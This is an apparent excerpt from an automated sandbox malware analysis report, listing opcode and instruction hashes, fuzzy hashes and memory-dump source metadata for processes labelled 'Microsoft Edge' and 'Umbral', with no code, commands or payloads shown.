                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 289d34a66f3ea03842efde066976bba5b4800885278afef03b002426bf4df719
                                        • Instruction ID: ccaa2cd5de578e1836b8fac7a3151c823b97ea7756bd6e29b3fa9da2443bfee0
                                        • Opcode Fuzzy Hash: 289d34a66f3ea03842efde066976bba5b4800885278afef03b002426bf4df719
                                        • Instruction Fuzzy Hash: 95814766B489166ED709BBBCF4011FD7BA0FF853A1F584576C048C7193CA356086CBE4
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2141116767.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7ff848e90000_Microsoft Edge.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 582700667e51b6a25738f15554695dbf8716a55e4f33d870691c4d38bd31f439
                                        • Instruction ID: 6cfc23439abd82734584ff39a818805a56bdde13c806ff55ee74d39ea013cd63
                                        • Opcode Fuzzy Hash: 582700667e51b6a25738f15554695dbf8716a55e4f33d870691c4d38bd31f439
                                        • Instruction Fuzzy Hash: FA813666B489166ED708BBBCF4061F97BA0FF853A5F588576C148C7193CA346086CBE4
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2141116767.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_7ff848e90000_Microsoft Edge.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode Fuzzy Hash: ec84b96383b2976a0070f99674405205b06a63163d5ae277f51adce9fb890529
                                        • Instruction Fuzzy Hash: B9A1262190D6EA5FE366A63848161B57FA0EF57390F0901FAD48DCB1D3EE29680B8359
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (sH
                                        • API String ID: 0-2369605107
                                        • Opcode ID: 78064eefb72cc97f3d1b5ef442b0d9391f3f6d55690aff8b182731bf1b349956
                                        • Instruction ID: d0361692531a7c5f5aaf58a30beeb1195e3cbc3ef503c51b1a125d5d09a37db1
                                        • Opcode Fuzzy Hash: 78064eefb72cc97f3d1b5ef442b0d9391f3f6d55690aff8b182731bf1b349956
                                        • Instruction Fuzzy Hash: 07519131A1C94A9FEF98EA2CC485A6973D2FFA5350B1841B9D00EC7296DF35EC428744
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ;P
                                        • API String ID: 0-3018336848
                                        • Opcode ID: b184b3204b20e398b95aeb0fc07b5f91271957cb1cbd94a31b32cbb30e00999f
                                        • Instruction ID: aa6703f27d68dad34c867d0f2a531a4110af9f0ea9937d63f991760021c0086e
                                        • Opcode Fuzzy Hash: b184b3204b20e398b95aeb0fc07b5f91271957cb1cbd94a31b32cbb30e00999f
                                        • Instruction Fuzzy Hash: C431F771A1D9495FEB4CBA1898465FD33D0EBA6360F04107EF84F831C7DE25A846438A
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 36996aedf25ac2d9b967702391e526ce608c34d847e209ba0ad569465966c28e
                                        • Instruction ID: 04679900f0b697444f4102062a2abd9a5051645c2af852c5ef4074008042595f
                                        • Opcode Fuzzy Hash: 36996aedf25ac2d9b967702391e526ce608c34d847e209ba0ad569465966c28e
                                        • Instruction Fuzzy Hash: 4982AE3060DF898FE759EB2CC4206657BB2EF4F384B5542EAD409CB2A7CE32AC458755
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9ff62d9d9fd6aa27dd3b521bb61f43805a3a41319aa23fae5fe2b7164b773381
                                        • Instruction ID: 9fc1e036e053e3eb45e96979aa9536dd81c6c6d1216f9daa2a1592da109c1e43
                                        • Opcode Fuzzy Hash: 9ff62d9d9fd6aa27dd3b521bb61f43805a3a41319aa23fae5fe2b7164b773381
                                        • Instruction Fuzzy Hash: 4562F030A1CA0A8FEB98EB2C9859A7477D1FF69384F1501B9D40AC76A2DF35EC42C745
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2c1bf4e559ca9a520fc2b8be49df6cccd2544420903c20fcc40f7f0139675189
                                        • Instruction ID: e254648a91bf49a530d4327428419b53657f4c2ed7ddeef6463d0d86b4057a19
                                        • Opcode Fuzzy Hash: 2c1bf4e559ca9a520fc2b8be49df6cccd2544420903c20fcc40f7f0139675189
                                        • Instruction Fuzzy Hash: E5325930618A498FEBA5FB2CC494B6977E1FF59740F1401BAD44ECB2A6CE24EC418B95
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fe78211ee957fe3199deacecef50880f2423ca8ec0975bd557ad07c6a0cc80e6
                                        • Instruction ID: 6cbcc1b49ef25449a98cc3880ed6beec94443cf63754e5fe2e7d6fd4d36c293d
                                        • Opcode Fuzzy Hash: fe78211ee957fe3199deacecef50880f2423ca8ec0975bd557ad07c6a0cc80e6
                                        • Instruction Fuzzy Hash: 84327230A18A4E8FDB89EF18C454AAA77F2FF59344F5445A9D41AC7296CF35EC42CB80
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 682948dbffb67ff2dc9550f082e62f205d540246f2ca96c8da426fb2b118a699
                                        • Instruction ID: dabfcfee0ca7053f0fe2f192b4cbc97e1fc5e4d12db4eae5973c187fefe0abd4
                                        • Opcode Fuzzy Hash: 682948dbffb67ff2dc9550f082e62f205d540246f2ca96c8da426fb2b118a699
                                        • Instruction Fuzzy Hash: 4002AF31E0CA4A8FE798EA18D455A65B3E2FBA9350F1441BAD04DC7286DB35EC83C785
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 64a8ab9a0048170f901ed8e6e15361bd350061f07f8f06653a9ddb26aab35971
                                        • Instruction ID: 20d85cdb48420b8447e4af78f870a4c0e3140cb97d116fd905030aeed574a810
                                        • Opcode Fuzzy Hash: 64a8ab9a0048170f901ed8e6e15361bd350061f07f8f06653a9ddb26aab35971
                                        • Instruction Fuzzy Hash: F502B211E0EA8B5FF79ABB2894152B927A2FF5A780F1844B9C049C7197EF3DAC019345
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b45bee0fff1d25489bb6e9f81cbdb5dc78e3c2a3b9d3a3f97a5dafd38346905a
                                        • Instruction ID: 27598e43f0b7e66f6aeade0e747a8a84453ade3f1d2ed13d2491b1184aea92bc
                                        • Opcode Fuzzy Hash: b45bee0fff1d25489bb6e9f81cbdb5dc78e3c2a3b9d3a3f97a5dafd38346905a
                                        • Instruction Fuzzy Hash: 74E1A611E0DE8F5FF79AAB2894152B567A2FF5A780F5844F9C049C719BEE3DAC018344
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 381de68ba6bad07c0762ae76183722d4c98f93909e566b42392df6bcfab11566
                                        • Instruction ID: 83ac0edfb343fc6305f445607d1d19db511090c64e2167e34b155bf45f928c7b
                                        • Opcode Fuzzy Hash: 381de68ba6bad07c0762ae76183722d4c98f93909e566b42392df6bcfab11566
                                        • Instruction Fuzzy Hash: 0CD19F20A0ED5E1FEA99FA3894152BD2693FF9A780F1505B9D05DC72CBEE3D6C028345
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 74ce12a06232339ef31bfc56dee47d1b0a4964136ea25af6b84b72bc24b53050
                                        • Instruction ID: 9a44b8cf93a1f644bf32b3792ad93e9322b2f4397f6500d59acb259bf9303bf5
                                        • Opcode Fuzzy Hash: 74ce12a06232339ef31bfc56dee47d1b0a4964136ea25af6b84b72bc24b53050
                                        • Instruction Fuzzy Hash: 32C14321A0DE4E4FE798FBAC94586B877D1FF99398F0401FAD40DC7292EE68AC458344
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4e1e9156261468595a963ee1ad9232dd77f38ae2ee62817fef13ee12b11d0102
                                        • Instruction ID: 116ef23c2aac4694c686ba58a0445d3a3c9746fb922460e106fd230933707e0d
                                        • Opcode Fuzzy Hash: 4e1e9156261468595a963ee1ad9232dd77f38ae2ee62817fef13ee12b11d0102
                                        • Instruction Fuzzy Hash: 61D16F31A2CE459FDB98EB1CD0819A973E1FFA9350B5441A9D00AC36A6DF35FC428B85
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6ea6a8c2f5c6e09452027ad5bc12d0f440524210e9fee443401f553fb705f06e
                                        • Instruction ID: 26f3092332c2e37cb4e4db561c32306e722287aabb199f0c5b906ed7a35536d1
                                        • Opcode Fuzzy Hash: 6ea6a8c2f5c6e09452027ad5bc12d0f440524210e9fee443401f553fb705f06e
                                        • Instruction Fuzzy Hash: C0C12920B1DA068FF798A619884127D77C2FF86790FA0407ED44EC72D7DF39A8824646
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5f7601739208999cc5e749f7239a918d644f9a965bc85192029df75432aeae28
                                        • Instruction ID: a11bd982f3389c0daeb99e3acbad53c93ddc7b3f57eaac36a036af56a3a05ff1
                                        • Opcode Fuzzy Hash: 5f7601739208999cc5e749f7239a918d644f9a965bc85192029df75432aeae28
                                        • Instruction Fuzzy Hash: 74C18F21A1DE4B9FE6E9FA5D546063536D1FF69740F4800B9D90EC7187EE68FC058388
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 79cda8257266f53afd3d1d48ed3b11cb7654ba29f9b75e59fc466958397893ce
                                        • Instruction ID: 898fa41e72c58e341136a877af8ab8aae9730647ec11e65e23ef7e67f3b07e79
                                        • Opcode Fuzzy Hash: 79cda8257266f53afd3d1d48ed3b11cb7654ba29f9b75e59fc466958397893ce
                                        • Instruction Fuzzy Hash: FCA11762E0DA9A1FE759B73858151F97BE1FF463A0F4801FBD04CC7193DE29680A8355
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5e006944cd506a0dd2db180897faa95151202372046a3317a2e236f148278316
                                        • Instruction ID: 42723e1233e77f2a6bb66eeccefaf1c5e2ee477503456aa19d327270c029bb95
                                        • Opcode Fuzzy Hash: 5e006944cd506a0dd2db180897faa95151202372046a3317a2e236f148278316
                                        • Instruction Fuzzy Hash: 48A1453191CB458FE75DEA2898855B177E0FF9A760F1401BED08AC72A3DA35B886C385
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4b3b4e1f962bfe7f6079f82af32c8ee9ed58c823cd96aca9e59a78b4605f0815
                                        • Instruction ID: 41d410755db0188be03d0f9a8064599b95240d8aafd31fd8dcc634ff9eca353f
                                        • Opcode Fuzzy Hash: 4b3b4e1f962bfe7f6079f82af32c8ee9ed58c823cd96aca9e59a78b4605f0815
                                        • Instruction Fuzzy Hash: 3AC10631A0CA8A8FEB94EB2888552F977E1FF9A354F14017AD45DC72D2DF396806CB41
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1b154a20a4656f98063518c1b4a3babd23b76a032c4df03c109dc382c1873c0a
                                        • Instruction ID: 513bd9961fc9bd64b54f183cbda71f19d1ddfa5274b45cf8a69070f738b0a585
                                        • Opcode Fuzzy Hash: 1b154a20a4656f98063518c1b4a3babd23b76a032c4df03c109dc382c1873c0a
                                        • Instruction Fuzzy Hash: 50C18F3091CA4A8FEBA8EA18C48477677E1FF94385F6444BDC44D876D6CB39E886C784
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ea73bac95f8cf87f3d886e4c3ede4020866590555605388b2bcda1c1ff2076f8
                                        • Instruction ID: d38a87fd6c0dd02268ed6b63125a77f2f7ecb5be4c7a13bc31bfe6d119cb0e6c
                                        • Opcode Fuzzy Hash: ea73bac95f8cf87f3d886e4c3ede4020866590555605388b2bcda1c1ff2076f8
                                        • Instruction Fuzzy Hash: 84A1D131A0CE498FE798EB2C945567873E1FFA9790F4401B9D44EC72A3DF38A8428748
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 25f0a388f3a0e9f7e4678a078d527cd9c26d3a849361cb576cace367ce5803a1
                                        • Instruction ID: 4051f438233ba8e477bb9b3095ad3905d3f7d23744c2ca944afb1d57eb693d29
                                        • Opcode Fuzzy Hash: 25f0a388f3a0e9f7e4678a078d527cd9c26d3a849361cb576cace367ce5803a1
                                        • Instruction Fuzzy Hash: E491B331A1CE498FEB95EB689855AB937E1FFA9384F1500B9D40DC72A2CF35AC01C745
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 387be137ce2a3ec82a73eff91f643c3bc95164db720af59d9e09aaca70b7d502
                                        • Instruction ID: a3954f8fe8979b71dcc8bd73ae9d09757bcdef188e1c65da82da703b8642786e
                                        • Opcode Fuzzy Hash: 387be137ce2a3ec82a73eff91f643c3bc95164db720af59d9e09aaca70b7d502
                                        • Instruction Fuzzy Hash: 8DA10571A18A099FDB95FF6CD898AA977E1FF69740F0500A9E41DD72A5CB34EC41CB00
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0f6aac01b724d2a046fb686edc25e3572ef464269eb36069f8fbab90469bc9a2
                                        • Instruction ID: 38838c90cea0f918c2dbaacea1c2dbb06c4df34e0d11aac3f660751c63325300
                                        • Opcode Fuzzy Hash: 0f6aac01b724d2a046fb686edc25e3572ef464269eb36069f8fbab90469bc9a2
                                        • Instruction Fuzzy Hash: 6C81F331E1CE4D4FD798EB2C94456B9B7E1FBA9391F04427AD00ED3296DF34A8428785
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: febedb2f810f5a9d5fa6248183c6acf498353b030adbb430a9544e2fda90ee33
                                        • Instruction ID: f8b8a7f474dc50731441571c273370bcd7c068992c2b6685427ee5f727476cb9
                                        • Opcode Fuzzy Hash: febedb2f810f5a9d5fa6248183c6acf498353b030adbb430a9544e2fda90ee33
                                        • Instruction Fuzzy Hash: 77816D3190DA8A5FE765BB6898011F97BE0FF423A4F4501BAD48DC7093DB78780A87C5
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 471c7f76fb6e629a39c4af7647d5915e8245b51cd3326a4e99080cdbc2ab41ae
                                        • Instruction ID: 14855aad2767ae06d1dc46c825075aee4a954677fe9393a117bed9c02cfd1cd0
                                        • Opcode Fuzzy Hash: 471c7f76fb6e629a39c4af7647d5915e8245b51cd3326a4e99080cdbc2ab41ae
                                        • Instruction Fuzzy Hash: D781F030A2CA0A4FD32AFA28D480975B3E1FB99354B1446BDD58EC7297DE74FC428784
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f77507d2ff3b7746a2f9129a9accf7631bd901b71d50b14cda3ea2fb36ea0fce
                                        • Instruction ID: ca2741bc4d813a51efb85bd37a248050b8523d2dc5d219330774cb84da345f63
                                        • Opcode Fuzzy Hash: f77507d2ff3b7746a2f9129a9accf7631bd901b71d50b14cda3ea2fb36ea0fce
                                        • Instruction Fuzzy Hash: EC91243190CA8A4FFB94EF2888156F97BE1FF59350F1401BAD859C72D2DB38A906C741
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1641d861fa9494bdd516072df5ded2eb1a00f734ccbc3a109afb06406aaccee0
                                        • Instruction ID: 590483947c5c07138b0e4fa8398a9ccff6d7860978c887d4117f2d03c569df05
                                        • Opcode Fuzzy Hash: 1641d861fa9494bdd516072df5ded2eb1a00f734ccbc3a109afb06406aaccee0
                                        • Instruction Fuzzy Hash: 54711231A0CA451EE75CBA2CA4426FA73D1FF99360F44517EE08EC3287DF25B8468389
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 85a4bec2a14a77ed3dcf664fb48a405dcbeca8f1ce8a98523d0cb32978324bf5
                                        • Instruction ID: 3186f223ea747498bab8f267fb46c8eb12fea246559d4637ce2d600c7241508b
                                        • Opcode Fuzzy Hash: 85a4bec2a14a77ed3dcf664fb48a405dcbeca8f1ce8a98523d0cb32978324bf5
                                        • Instruction Fuzzy Hash: 8A713731B1CB491FE758BA3C981617AB7D1EB9A790F04427EE44EC3297DE34AC024286
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6fe4bb5c8505fd8a9f5835c754450f110ea8c7ea386575e397c7c4b39e431bc5
                                        • Instruction ID: f3e3e1daf3be95d89ae62a20b6bfda70891ac936fcce2d933fee5e8bfc6f07a4
                                        • Opcode Fuzzy Hash: 6fe4bb5c8505fd8a9f5835c754450f110ea8c7ea386575e397c7c4b39e431bc5
                                        • Instruction Fuzzy Hash: F4913134A1894E8FDB88FF18C494AAA73E2FF68344F5445A8D41DC7296DB35EC46CB50
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 02afbf3e25ea2675b49aecb517d2f35a66b5190f7e791e749496ba7303552318
                                        • Instruction ID: 3db4d11ec91e461ea70bcd21897177e24b93b63df18d9146e5b247964f854450
                                        • Opcode Fuzzy Hash: 02afbf3e25ea2675b49aecb517d2f35a66b5190f7e791e749496ba7303552318
                                        • Instruction Fuzzy Hash: B4816E30A1CA0A8FDB58EB1CC884E72B3E1FB99354B644569D04EC7696DB35FC82C784
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: eb839b44421c3ac1ad4dbfa9fdddfab56449e90a8c5d483997494b1006952abb
                                        • Instruction ID: 4f8499e837566beb25bbfc9ef08ee515ada423ec0292bbc3c4b5ca31a6be5351
                                        • Opcode Fuzzy Hash: eb839b44421c3ac1ad4dbfa9fdddfab56449e90a8c5d483997494b1006952abb
                                        • Instruction Fuzzy Hash: 33717E30E1CA0A8FEB98EA2CD8456B977E1FF99354F10017AD44AC7292DF35F8428785
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a41e0685b96f1ba6686ed6522eff546e4ec5f16eb26de8781c5dfd6d726ce2bb
                                        • Instruction ID: 75dc4825d96cdac86eb04381f1cbb3fdb73ea5b41773bd831328eaba0ad0230d
                                        • Opcode Fuzzy Hash: a41e0685b96f1ba6686ed6522eff546e4ec5f16eb26de8781c5dfd6d726ce2bb
                                        • Instruction Fuzzy Hash: 92916F30918A4E8FDB89EF54C895AEEB3B1FF64340F540579D81AC7296DF39A842CB40
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b3b997f88f1b026c30b5520b19af4964e5b5c7e8fd706d380bcf48c64c1b07b6
                                        • Instruction ID: f3fb3b31034190f3604f821fd4bc57a1f8e735bd77df7f2f815c55d91dcbe4dc
                                        • Opcode Fuzzy Hash: b3b997f88f1b026c30b5520b19af4964e5b5c7e8fd706d380bcf48c64c1b07b6
                                        • Instruction Fuzzy Hash: 5C617D73F0DA595FE319B76CBC960F57790FF412A5B0842B7E089C3193EE2958028699
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ea70178ce692931bb71e28b61b5c4243cab53ad0bf6cf89929197662ce5398de
                                        • Instruction ID: 8a9debadfb49a5d59cff69d3974c91d797ff9c6907b9d0c67ba3c13b576a4141
                                        • Opcode Fuzzy Hash: ea70178ce692931bb71e28b61b5c4243cab53ad0bf6cf89929197662ce5398de
                                        • Instruction Fuzzy Hash: 5A71363180CA9E4FE765EB3898151F97BE0FF46394F4401BAD85DC7182DB39681A8781
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a0705f5937b32754a0e044e8fae542b554eb43dce0180b807f4b43ea02770ff0
